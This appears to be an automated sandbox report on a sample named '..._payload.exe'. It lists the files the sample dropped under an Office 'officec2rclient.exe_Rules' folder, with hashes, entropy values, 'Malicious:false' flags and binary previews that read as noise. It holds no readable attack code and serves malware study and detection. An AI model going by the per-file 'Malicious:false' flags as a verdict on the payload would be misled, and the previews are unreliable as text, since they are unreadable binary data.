                                                                                                                          Preview:<?xmlm..E...k. .wv+"S.....C1/..<!.y.9@...O/..g.w>.....r.....Hy.Y5....U...-&..F.g.t..L.?Z>..h>...?..`.^..2.P.D%/.Y.O..D.C<]ZKc..;..(..l3.....#......j:..Q..?../......X....]..2&VZ6:.._....-.....Y...k....2....h..H...D.*......{^..{m."...19y.>Y.4......L.88.`#..]^"h.v.i]hk..s......8......X..~$...|..j....&V..\.l.1..fJ...9-HI.j............d]W.V..J..S.m.(.j.~........~.x..o..]..].@'...$...J.-(:N.......G...+J.z....Mo..Fl'.0..)%....}V.`W4.....<...>.p.W.........UR.y.c.&.....5.k!......D..KBT..x..k..C....... %..$zm.Jo..c....).\._.D#/..}.a.......Fq.K..7.c.W..$..d..rF.F..._..F..1..'.\..*.....d....DK..\~....j..|k;%x.UP.:s...dqMP....D/....<.:F...d@.'..M.}....#.6....;.=.X.w.....d^e]......Y.t....=.r..4.Z.3....$...R...T.R...........z+..c...2...V....W......p.J.W...y-..z.s.<u........U..H_O.A...*M.U9i..zW..XmF..(....$..5.".."Q...3.D.P.o..?h...I...g.QS..L..&zZ.]t&L..Zd....B.Y.8.q..!.{3...?..O./.6\=.,.[/=(.;.B..\....D......S.>.*...+....Z........8?;9.&..B.Y.Y.@d..(.\

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703950v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1699
                                                                                                                          Entropy (8bit):7.871521889425897
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:APaNuuTDzL+T8nSkJsoP8G0+ZOigy6ARqUD:mEhDzaYnBMG0AKyjr
                                                                                                                          MD5:3CA680616308ACFC2AADAABD8368F928
                                                                                                                          SHA1:CD72B014A9BE7C05C644CB17950569C5A861BE7C
                                                                                                                          SHA-256:A83F4C14B942025730FA63457F04B5D454BFDCBEEF2FFD4F87DB4730871599D9
                                                                                                                          SHA-512:B0D56C5FD0F11E2FA05239A34D6FB1E2AA54918BED6EE99CFC473E7AF6D5B0C0CC139B4649ADEB8F91127C990C33C6608E776AA7E95E801282014AF4992B7527
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml=.8/.h1O.u....y%.....^.w.I...&T.{..."...:{.s..FZ...x.......M{..w...|G...cG}GD...5.7*.D._..\./.xe.6.m.......C`u..#.....O...:....Z;..]m.d$..x./o.E.X...8..>.L}W.t..<`.E..s.A..Ky5`r......f...~..VP....g/...BI,H..HS..,B..;.u...^oc..H......~....M.)\e.P..:..^...7.B.h..8.C.......F..{f>`J....]YpW.'.{.%....C.xF.~*.m../.wl.r.........&f...S...&4.^+........z.&.O$#Uwl..pD..;..E.6.O.:_..N..........,...g]Y$J]U'~..h............u.......e...B||~-......TA(.K.?.]....S.R=@.l.+.l..)i...G.".a..N.N+....?G.p..x...+|@..x8.....R.I.PQ..6.e.._...nfB.|"..N...C.B......SO.........+....mP.....# .y....A......4h.".....)..E.[...K.[.o.T.E...)....$..h.H.../...`.....A.....U...AA1.:..T..q.2v.p..GG.d..9.)X.......=p.'{.=..{..a^...:m.<..O...w..l.wz.5.....o..A.mO..:yE,...|'...)<..:.8.YBm.7..q.S.n<...)U^.).Oxm.%.i...C..2...g.. ....jdBX.....;.....P....1.....5..zi..BK..OC....J...9.,P`.Z..ADC~.!..m.m.MjQ......oXi.sTcph.I'gz..\.....:..0.x....N.J...<.l_....._.5.c^.m..+H..,p8..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703951v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1736
                                                                                                                          Entropy (8bit):7.892753357002864
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:GPhxsZ/llFEbZqQFiqD7tEnk2jI+LrdLMD:whxsBloYQZD7t52jTXdU
                                                                                                                          MD5:5FA9BD2F10056AF0704958093C9577A8
                                                                                                                          SHA1:3FC5D51626F38F1CF45173D876ABE79D1FA3754C
                                                                                                                          SHA-256:D39883B87BDAD095D8C572E71911C21A6F7B52DB29857E99300E7352A2A39CD6
                                                                                                                          SHA-512:66B3F2F0D3C382624B26F371ACADD0122C1F2A826C2CC73132D1FB89F936CA6ACD7681A7AF66CD41D74C8BEC37D0E4BE4109FCD7062750A14B5D041F1B33AB6B
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.~!.;[....V....$Nb.....dd....\D./....;.V.......y.|..1....E.oDQ.7.B.@.v|.$.sx;K.:.<.7..iO..D....#.._K...SCQm[~.{R.<..-.|..w.......j3.$....X\.F..S..'9/&m..m.Do...}~..0...ue..M.?-A<..2..d2sEA...ju.t..4.L2...m7&.....|...$.[..5...-.4.........S;...g......:...*..Z...6....F.~..mfT..,......9../Li...[.....g.;x#.L@.,JO....!E'.e.i....5.p2..u`.C)^..VR\.W E..!L0.8.\Z.'..j....../.!.$..%#W.].....%..F#......w]..s.7.....)..Z...y....0.....8.*E.y..r..p(/."....5.g......$...h.8...q......$A.....B.e...r.g...WR....|..F.Gi8..=...dY ...Eh.....Q.sd.|.p..lZ.".i...z..0.h.".h..kp.`...v...bPS[d.....NT.8C..C$.`.E.-.2......H.().6.....fR.,?B+...f.D.....}...^.W...Fn..-.......$g;...j...D/ub..=..5.ls..Y........Q}r;..Jh.CU..f...=..%8.y:=.U..gu.:K.%...+..:.l.;A4A..'u..s`.C.....AW..RZc..T....:.$5...(.yJ.X...z.4.H... ..1.b....j#...K.G..d.3>...yR]Y.(a.|#.+H-..H.....Q=.%...~..o`.7....r..\..yVTt..fkG.k...=N1.T..8...|.7.z...k.g...n<z<...P...4...&........&7.Dm4..C....+Ou...&m

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704000v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1715
                                                                                                                          Entropy (8bit):7.869119583407572
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:d0IifHIKnoAchgKkMLmXkd+9HRW068vlx4LEmEYuD:iBfb4hgZv+8xv6a8LLW
                                                                                                                          MD5:8D6751E5D92B0CFCF9FF3A919969AD64
                                                                                                                          SHA1:49230C06936133D28B07FF872A2ACEFDA15A8607
                                                                                                                          SHA-256:B1126828727098F8BF592CAA2F88CB7359BACB81F2A424D87B9B4829C5D2ACB7
                                                                                                                          SHA-512:058105C44B7DE9BD89142812B5B4DF41DD74EF5B34341D82E24DE4B570923F623E2B577C2647A2EEAF8ECCE9332250DED95B846D6FB5553849AB030E3757D663
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml^l.6....x.C.+.Mw.E..XMx......b{x.!...NuOE{. .z...(.C.(.^....).$..%.o.5.=.}O..v...}.....r...*.;..A.n.....)0.....h.....2.8sg...%M...}T.N.B8.Y..........*...N..(.zg.z.....D:.~>'...oX..........u..c"....5O....(..r...7....G...'{he...A.....s{....u...<..7g49.|...X.a.._a{L (2.....lB......X~..-.G.....$F?...N..!..m+.....d.zf...'.V..h|.......)......p.....d..V.n.YG.F..~.T....E"Nr~.4?..m?{....f..TW.hn../.w.&..<O~.)as..E.a.`..U......9.R.Y.Ox..@..R.H..D(.....eE..O+.$(.D4.x..WZ._.......L5W..i.G...D....es0^..rO.Fl..1Gdk z.'Z.....)2.....#1.q...).....kfHH.8.R..[..r.......Q.p.z....8.f.#/s6..Z.[....3...[...at..\...A..9....A....Y..?...w$397.r..E.%B.......',...g...&.-#...u....UiA..|wI....i..5lG...D.q..../+....KB...q.'.....}h.......a.%...`I....{......B...f3......|y.4.xA.p=.;.0..U.}.G...`q...bG.7fF...Q.6.....$yY.n.....4......._(.D..b.g...9.Q.R.^..6w.#A.r.2.F.c'Y..<.{4a..w...z-....k....m81..V..((...Z..Q.:m...d..F.-..%.h..}...&.8=s..n.......&F%r.6.@@.?..E,iW7...Q.{..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704001v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1752
                                                                                                                          Entropy (8bit):7.892362676207138
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:dskEhUaVnNPXg7SI9xxq+9MnlhDprDrRwHhsz1C+r0c3WP2hZz4KvlVN8Gq5Dy/V:b4M3LH2zprfWBsz1C+oa5hZzrdVMZL8D
                                                                                                                          MD5:F49073A97B10B8585CA6319189F50EB1
                                                                                                                          SHA1:0FAD1C4E433A640DBAC5235CE042E31DE6AA278E
                                                                                                                          SHA-256:A6AA459B52DD6544872ABF24149EE69008F94BE4FCCA8C703BCE0F0425DAEC01
                                                                                                                          SHA-512:BD8F6525585B3FEC5D14C9D276763896BD22E72A1000E49367A3AC55B43EE300A6A3BC8EA14381A26182BBDC20E8869B32AEEA451D3F5074606183DD3A4E5DE2
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..M..9..'..4vhE.9K.S2....Y..{.....N.$....~^....-G....$...H.M?_.D1MR;..U.v.)n.n..\..M........JA...BP.....{...,X >.....f...n.u.1.......`h7....,..S.Z.o\.E|nW.Q..=.nA....r...f.E..<85..`(..LC.&.....n.9Sm...5.s..}i..../....|.......".vM&../...?.o.`...9*b.uIW.....{....&.z............H.*9...h...<.(+.&...q..Z.r...^R........K..p..8Q[.._.7Ke........G.Y\....1.[k...f..@.......N......t...%.Lg.....+..?i.K.[...~.oM.........._oY.76oU............k_:PLg...z..G...t....J..2...$...b...Z`...D^p..;..Ny.U...<....b.?}..P2.....L`.<j....z...!B ...A.-...L....b|ik?[.(.y.X.j.Y.Y......N..kK;...@}=.......?.c.]....6.j#.tOs..*..R}.|^F.....p|......#.<..8X....J...q.R..3.ng...p.ie...'R^....X..\......c.K..2e.d.H....pr..Y...<\W[......ni..~.'........iy.".........{!.._.....[....tl......./...L.$.....3..x.Z.F..m...wB)...'u2.}..*.......|J....9.H..S7..V.].W..@...Z1...H..f.B3.s.r....X..0T.........1.hJhG...f...._ju.iG'K....T....(r..l..n........i.I..;~C":........O6...A

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704050v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1689
                                                                                                                          Entropy (8bit):7.879031923527916
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:PgaUkKJjevbyFF8rmLfTmzIPUen84d+Sb6g4QNJ6hl6Dgvzwx6D:oaUkMRErmLfTmzIP84dOzSSso
                                                                                                                          MD5:307C55D5DE3EFB45FE9062FBF6AD8B27
                                                                                                                          SHA1:2F72D50E135571D61CBB22EF3378C9466CD60FF7
                                                                                                                          SHA-256:9130F56EABAF66E398B73C10B441E17C08930533F18345A5C06E5E79D040252B
                                                                                                                          SHA-512:52182A81C783BF85E1D8C515C25C41A34B4C1E9C42A01FF84F1E218146F553F5EE3214B1CD35E68C395BD06893002101B3FF5CBF641DE15A298DD9505B9D5AAE
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...........n(B.b.&G...i........9?...J.....B'.....4..t.0...L.F.M.k..QL.{...p.%#.7......4...-."v{J...&.G.J#s}....p%..c`...6.wC..U8?HgC..J..y.l.7...3._P.%.G.v..J,(..k.iLm...@.;:.9Co....~..+.. .....Is.D.......E...R.....C....T.....|.&..*..<qbN....U...........W.3..A.L,_....w,..v;.e."...c`<b..iBU....:W.4..`h..j.'.vr.rGD.=...".lx0.:....Od..+u0.y......ias.oq.*...e..c.bn..ht..[.5..u.g.+\..yA.>.0.gO.....MK......)....9....xB#MHA1..G...tL.4'IN....).0.2.E .Lf\.R.Z.....N...[U...s..O...Y9..E$.Mj&AL....a1>.D..:q.....rtI..~m2@........_b,...7.\....3..k..>8{W..4.,....r......6..,l...S......4S......=.'5..K.E...h.@Z?AO'4.cu..Y.........+Y..]..C.....a..y*S.^........T...A...o..(z...R..I...........=.....J5...W.(c,.%...&.d..vgR.My...Y...l.b..*...G.I_.......e.........`f%7Qf.r....UP.s!....$....*[.D...2...uJ.J+.=;..N@...4o....d}n....4.y....kX.. 'J3zY..l#..,.OZ....y..]V.....3..p.E9Q...z........y.)mD...L....uo...k\.........f.Q.a..l.....2...x.%.}/.....D........O.N...X..9...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704051v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1726
                                                                                                                          Entropy (8bit):7.891309321888311
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:jWKTl/ML9n0osJ/R8i+Gslsx4zMLYp+OD:vBMGb5NsaxyMLE+2
                                                                                                                          MD5:198DAF8003B0EF8427821BB9AB66B020
                                                                                                                          SHA1:08498265C65918FA882400EBD6AB7F591E55CC82
                                                                                                                          SHA-256:8A0DBE6D7B1326A9F35C944F36AFF998A98A8133DEAD2BF62C443C61D9A474FC
                                                                                                                          SHA-512:8F0D5130CB6DA431C072B9EBD8934508E32C73C60CD15E2F264940EE371716CF9D405B86C3D334121D44099D4D3F81E5823C1ABBD401C7E601DC472122CA75AC
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.=.0.r.s-..-.....6Z.\%..+...W).......k*...`~..JY.".v..J.<y....._....SF..r<..wFL...q.....JP.Ie......."jp4.g..\:..S...c.Ub.7N.L..%..E.I.."N..bb......]~.O...8.!..a&...V...C...D.Yd..d..R.WE,........@g.8.......B.=...(!#f....j....m..Z.KUj.I....z.Sw....{.~Q...,..v.....Fx.=[.q..{.Uyz..+..>OM.*2h.....&^.B.v..=7.c...J.y..J....A...,.:.(...............t{........y.? .r..V..3..$.D.....wO.~].0X....?.')a.)..o.\.Wc...Rt.^.m.&.*.m).w......J.U.#...-.T....Z..Td~+l....j...?......@........wT.....9.g...a8....?......f...<$j.,s...fxP.-.:E..8Z.dV9.VR.=.g......q.f.G...jC......x.u0X.....[.Y.[..F..*....._~5_....6....I.qh.d.m.l...9.....+..p7s._5....<.[A*....4.-o'...o_.y...}.o.....1........eC9.q[....E..Y..n...A..V....4H:etU.a.<\~..e...o.=...v.-. ....=...../...O..].6{.W....9.sC..d.(. .......i2....e...R.,../......X...0.dh....A*.ik.h^.Y..+.......jV....6....=.i4............Q*@.H..K..TO.I...N.gf.C. s...H.....^....H0......_.%(._.B.~......L..[...aO..}.b.zR2c....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704100v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1695
                                                                                                                          Entropy (8bit):7.8751661802584545
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:Y7f5XNV7OboXsFDWHaPK0QCwW+n34LoYFwXts7LD:Uf5r7pmDg0n+nXYFqsD
                                                                                                                          MD5:36BBC126520B977A28AFAB4E9C24062F
                                                                                                                          SHA1:B22690D5DB6413A2864CBE12094E68D721E24772
                                                                                                                          SHA-256:BDE419556AF98F0267F4AFB1D843D1E3B3F38EB35C8B9BA3F756A3845148BF54
                                                                                                                          SHA-512:38194C233613C5B88DC64B84F55B8763D8F8095647B4176587A01671421B5D275C4EF3D6EC5DB70AF7AD0586757A00F1BE66637C9DE0503CF51D618E0A8FE5A3
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.W..%>Ol..N0^B.....Fu..L.k:...B>.=.....5.e...5..-.)....U.t.;..}.H.x.t.8`:..I......1[.%.e1..h...Wm.s_..M....I.K.3..fo.{^[.6....=3.r.2p$&.o@...xi'F...(.)...<^..o..L.....B{]{r..b...(.]..%...J.;...D..N.a .?.<.-'.=u.M...x^.....$..N.G.*....:......l(.,E.I.`.+.>..V.G.F.N.............,.>c}#.d...i#TS:...%.".r...*...~]q7%.%e.......^..iRv /U.H...F..+xB.Sb..\..w.|t..f.....bx.~...b{G.z...|..*}q..<..........D...;<........q..:AN^8Q5@...iD......G...H..D....".M.........B>%y-..B...b.'.`..O.8..2...u$...V.V..L..t.)_.............[..<-...sV._.-.P.W......8..e..]..T.*......q._~..".9..)...h.K)*. ".H.l.P..M0Is....(u...,t4..9~.i..>73.z. .....Ts.Rl...a..o=q.xr.2O..D...W.!.e.D....Hm#...N.A.0..9R.H.%&!..AE...=B...o..4......./....s..q6..FO.........6......2b.../.,x...%*..G.X^c.....-.b..9].%..7.. ...N......&.b%..:....3[..4....o`.s.2._.M......ci..K.P@[.t..m.c.i+N.-.......A$.ZWZ..Gw......%g?oA'y.6..........!".......r......];..I$.K..6x...~..k.v*m.C.E..e}...D..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704101v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1732
                                                                                                                          Entropy (8bit):7.876685266678442
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:/TOlsPBrKwAcj0tFts5UX3Z83Q7cWg0PRIobCvS7D:KWtEA37CZjYC
                                                                                                                          MD5:B7F8151F035573D2E7F52321B59AA32B
                                                                                                                          SHA1:79AD2D0FD87BA6FE3FC2892D87177F291B6868EB
                                                                                                                          SHA-256:E062C8CCE2EE4DEB6B20D438D93536F19D540F4508337A18A627F7E18F04DD15
                                                                                                                          SHA-512:F7F99ED86889B687A2C9FA93B7CB43421AA8E543DA107A491C748CE295FFB54E93B44BA7E8C3225409A2C4E9C518EFA7F055DE376458CD0128781D1F686BE78A
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml3..l..e...)....8.D.V..IEA..2ix....`.......{`S.....Y.A..$.....~..].j.yt.#...VP.}C...R...l|...]l.CW...W...C.4............4/^....DA>.V....eP.0...7;x.7........\a\..B.|;1.g..\......%...L.._.....MyO...9..j..@...?....qC..Sg<.i...S4Be..&..P.OE.4...U.?-(%...R.....@g...k.....1..ZK.I.....v#.cE2t....F....]....V3.-Lg....3......Aj.ga..9e...h...zUV.:..v.F.C.p.2h..7ml...2...x.].$p...g.9r;.....$.3...V.;..xC.7PL.....f...F..S...q.9q..B....`..sY.... .d.Nj..$G...4...s..8.o<.6.g.p.f....n..v.@:J...8....8a...X9v.....'........@...a.sX._.i].>.P..."WF......t.......}.=..\.E...._...:opI.'....J..*....b..B:j,ts.......`...5......)D..6..M...N."_.*..Z4*)......R[......`...n....x.<.'-.....l.%..~.B..L......L6...Dp,(.S!..z.\R&..V..(.t.........C4.l..o.\.j.J.1.C...T4."H2.9j..0Z.&K:..L.S...*._.......I4).....-.C.e.O.tf......b:.v+..Y.q6...=.U.m...Y./..m.A^.. x..m..... ...(.........u.Bx.P.{....E..3.Q....DS..hbKYp..H.......m.!.@Y....<..I4.;.P.1`.8U....#.....~Y..'

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704150v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1695
                                                                                                                          Entropy (8bit):7.8885717219927685
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:j6FzH2m+sB4UgOtMYc7Jq+v76/ZZeIeB8LGGsvooD:+xHrPeUgO6Xiu+Lavo0
                                                                                                                          MD5:3E69499FF10A72DA0604EB8E3A0FBC3A
                                                                                                                          SHA1:A5808931B47FEC342C3D524DC868B202FD09BC14
                                                                                                                          SHA-256:24052305D86D83C15A4AE2BBF0F0833651E3652D1535D0CD4D87363A5A7546D7
                                                                                                                          SHA-512:C753DC541719936B35CE3C7BBDF64CC7329EF0E3830D72D23DF0FEE27CD84AF382F01BD50B31BC3F6A7C113E3CAB1E28376B51FC38F395055794FE06E3244B7A
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlX.3.k...(.f.q...F5.`....0>.9b.#.ja.J.M.Z...3FfV.c...[...,.QG...E..?L5-..G.0........=;.3......N.....<.v..........Fj..;E{...@X........G...a,.{$62?nZzz+.=..U....s...n."u[.(..,..T....|7....n......i....v...M.$..S....Ru-Z....|*......5...K3.KE.p....D..S........:.kf....p.*3..09..V2rBOE3..I].j..J....b.3.x..:.P[....W5..0..{k.JB......}.Z..k.y..N.._3Z...j...{.?....j.<...L.....IV.q.Y..C.....X.."h..... .._7..s..vi...!FKE..0.H..J....;.zK....zgN.........r.......woJS.#,.......d@..{..~.J.l.S..p.W.`n.0.....q/..:+..q...{n.&lg..N%...Q.:O.ROD:RW.E.B.!..*f1.......6fL^2.6.....%..=.a."......Y...(.2v.Z_.I..b.....uSvO...5..;,..#.b........8dQ.z.....#..x2.,..=.T..`.PD.@A...D..l".\..q.dz..V....%.0.@4.y@...N..,..E.O...1..P...q..r...y..?....I5. .Qo...,)...*u....0=g.g.b.".%...c!..<d.d`...?."U...x..0...q\m@.v.....{...M.....B.).$.F*y...>P.c.J....V....q.~.......r.Z*.....K...=l...X......7.e.........>.>..gW.93.p....v.<=......#.5.&Q.......(8/n.c.Psk...K.e:...(.YdD.&."..m.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704151v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1732
                                                                                                                          Entropy (8bit):7.881761729803539
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:PuXEI1ERsPKaBnCcELy8jhe7W7TJK+O9ciVEeBZPLuvI74zvjgAtPgNYOIxbD:PuXjK6BxEfjh3kZV/BZDuvfgAts2D
                                                                                                                          MD5:974F20116321263CE41F52F93DD71A73
                                                                                                                          SHA1:DEC402FC3837733C3689F68A36C678FB6A955B38
                                                                                                                          SHA-256:AECACE506B0F815B05A468176F4206A610E6602DE2B4753C7B531336544B36BF
                                                                                                                          SHA-512:36BA93ED7B96AAF321E859563C5244EB1FB3D927ACDF9CD5F04CA98E50E56A5E5291D391DD87E99018451E15A37740991227B99853A4303D5192DC6643C4D2CE
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.^y...<.).".Z.qE........a1."..b=..J...U..Z......|....ZO...4...Os....U.w...>.G.E.5p.cB.%...1}{....X...........z...v...vTN..+.'C?L...BZq.//..O....q#..=.....X......y..-....M.o[..0.S5....6k..k.)........x.......G..=.W....LH._.,"!.$..k.e..$.......#.]..~F..E.. (:....|...m./<A..|I.m....xY.H8j.."-.1..=)O.G-..w....v b.t..HT..LJb.{.0..S....p..b.......2q....!>.|t.d../4.E$.$.....1..t.......).)....&....t...<e....?.i.~z!.....\z...s.Kl.<......>....n.5......*.K............*...<...6.......V(X..B...>.v}..q!{..GY...t3..sU....Bp%S.......ec...>Y.......L=..........!":._p.........Eq....K......,iX..O...C...a;<....p*.....m.&....1..l@I.....~.3.GK.MI..C..>..}...e.....E.^.KG....5.c..H8...D.U{.....E.A.aF.f.$.&..p.9..:..J....).Ps..{...cr.G....$t..].:.../c...R..B.2......'.NU..k..n.c.r.Ui.t.p..~..Fmq)c..a>O,.....!6.4...m..Z..(..a.Q......T.cMe~;&...x...)..{.> ..5....T.jbm`E..\{-.lB..L.......p$&.;.a'.6...Rr..s.......+.Dw4>....q%.... ..P...#F...X..8d.L.~.LD.....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704200v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1713
                                                                                                                          Entropy (8bit):7.882742358231916
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:U80tVUqF/QsqB7tvXJ5x+b46R+V6+g2z1QHD:m4pZ7NZ/+EaNTn
                                                                                                                          MD5:1AB3D74D973F356B8B35FF75A3DC46F3
                                                                                                                          SHA1:46DFC2F6BE93612246146E4A6A28D89F2BF7A96F
                                                                                                                          SHA-256:18CD2B3810FB23BA1113FF041B4C6A1F4C2D2B5BE7B7DAF46543F787F6BB89D5
                                                                                                                          SHA-512:51F2425D81C513816DB116AD34A71F42CB4261EFF386269C78DE3630137DEAF856CA28455D46B6F68A8264D99F19CFBEA3FE6876041ACB6DCC898D763D7E2F67
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.Re...h...+q...Ln.F..D..2..#...Y".^. ...zJ\T.......+..Q...`.....?.......2..Rp3i.W..h....F..O..Z......(..-l.k....._+:......k..j..b4.c.UQ.3..6../.86y.h..g..6..R$....w....g.NM..+...z....n/p..SJS.%)h.....4/-....h .t...7.j..+.#...e....q.\`.;..h,.uz.v...'`@.l..C..<....{.....zh.....Ob......!0:..kg...U..E.'..D.2Q.4..]p......k.u..^$..yg....yL......f.........q..S0Q..W.O.Y.>A.I.nH.......Qx@....@.....cc..g_.1.&.,...7Z6l`..p~%...'.!o.............0...h..@Ae.yw...@.2.kr5.}..-.P........q..W@;x.U....h./z..O.S..*g.d.(..&.....h.G...A.N%d._........GH..|"..-9...T.B...,q.;}(...YO..8!...JI.C...u..9.r4..Z.........z...0.t......QM.d./)...o...^.....cS.>..?p.;.(.[m-m..."...F3..D..............n..q.%.l(.p.;.p.r.Z.(...~..=^.14[.....jsJ.D.gB.....y....{..1L}.G.t..v..\...(...'...<..f.[L...?...6.t.z.X....Ey^.....G.........Q.z.....@wGPV?3.j..O|.Le... #.#.d...C.pu-.....f...:..u..zS...g%.u.......$...>:..BD.R.....*t.mD...K..a/.......*./nh..Nx7.^...}..3..!8a..h.t{Q.>n.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704201v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1750
                                                                                                                          Entropy (8bit):7.882153374123675
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:3yg39zDIKI25tfofwwdSua9ZqJT/4oKOrZh1HnVEoOD:39IJ23oJMABwVMn2
                                                                                                                          MD5:8B0DF5F85FD0FEDFB40F08E7DAB56A1D
                                                                                                                          SHA1:948A5003747A14D420E1D2A94FB487C502C4D378
                                                                                                                          SHA-256:2F03B591D27AB42DA6D52E0CADCDCA68D68EA9888130983FF84D594102CC1045
                                                                                                                          SHA-512:DE9847A8450A4FBC2CBB41FB08B4025D38DEF5E92C425CB83BB35269B245B7ADE01C2B890400FBC3C37551890B5E2DD7ADE81069BC5AE75597C7484CFE513D13
                                                                                                                          Malicious:false
